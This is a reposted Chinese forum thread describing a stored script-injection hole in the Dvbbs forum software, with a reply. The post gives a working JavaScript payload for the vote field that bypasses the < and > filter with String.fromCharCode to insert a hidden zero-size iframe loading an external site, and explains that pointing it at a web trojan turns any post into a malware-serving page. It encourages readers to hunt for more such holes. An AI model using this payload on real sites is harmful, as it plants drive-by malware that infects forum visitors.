返回列表 发帖

[转帖]新思路现动网新漏洞

前段时间focn等人发现了动网的提权漏洞,这漏洞可是闹得天翻地覆的,连当当网论坛也给挂上马了。正是这个漏洞盖住了动网的其他漏洞,使动网的其他漏洞少为人知。 相信大家都看过《终结动网最新挂马方法!》的文章了,其实这个漏洞已经出现了大概半月了,后来才被公布出来。利用方法就是在“修改个人联系方法”中的“个人主页”写入代码: 在MSN中写入代码: 其中ssssssssss是我们自由写入的,那么我们能不能对源文件进行欺骗,从而让它运行我们的代码呢?打个比方,一个括号:(),当我们在()内写进)和(,那就变成了两个括号。道理是相同的,我们也可以这样进行代码欺骗。我们在发表投票中写入: ';;var votenum=';0';;var votetype=';0';;var voters=';0';; 代码是无法执行的,动网进行了过滤。再次饶过思路,动网只是对<和>进行过滤,对+';/等符号没有过滤。再次在投票那写入代码: ';;document.all.popmenu.innerHTML=document.all.popmenu.innerHTML+String.fromCharCode(60)+';IFRAME frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src=http://www.wuzhou.org width=0';+String.fromCharCode(62)+String.fromCharCode(60)+';/IFRAME';+String.fromCharCode(62);var vote=';1 如图: 发表后成功跳转了www.wuzhou.org这个站。如果我们把站改成我们的网页木马,那么一个木马贴就这样完成了。其实这只是动网代码欺骗的一小部分,还有不少的地方可以进行代码欺骗,比如用户头像,联系方法等。 后记:现在很多的程序作者并没有看到到代码欺骗这安全危害,在我看的很多网站程序,不管是asp还是php的,都有许多程序可以进行代码欺骗,希望这篇文章能起到抛砖引玉的效果,让各位朋友找到更多的漏洞。

[转帖]新思路现动网新漏洞

这年头,漏洞真不少。

TOP

返回列表 回复 发帖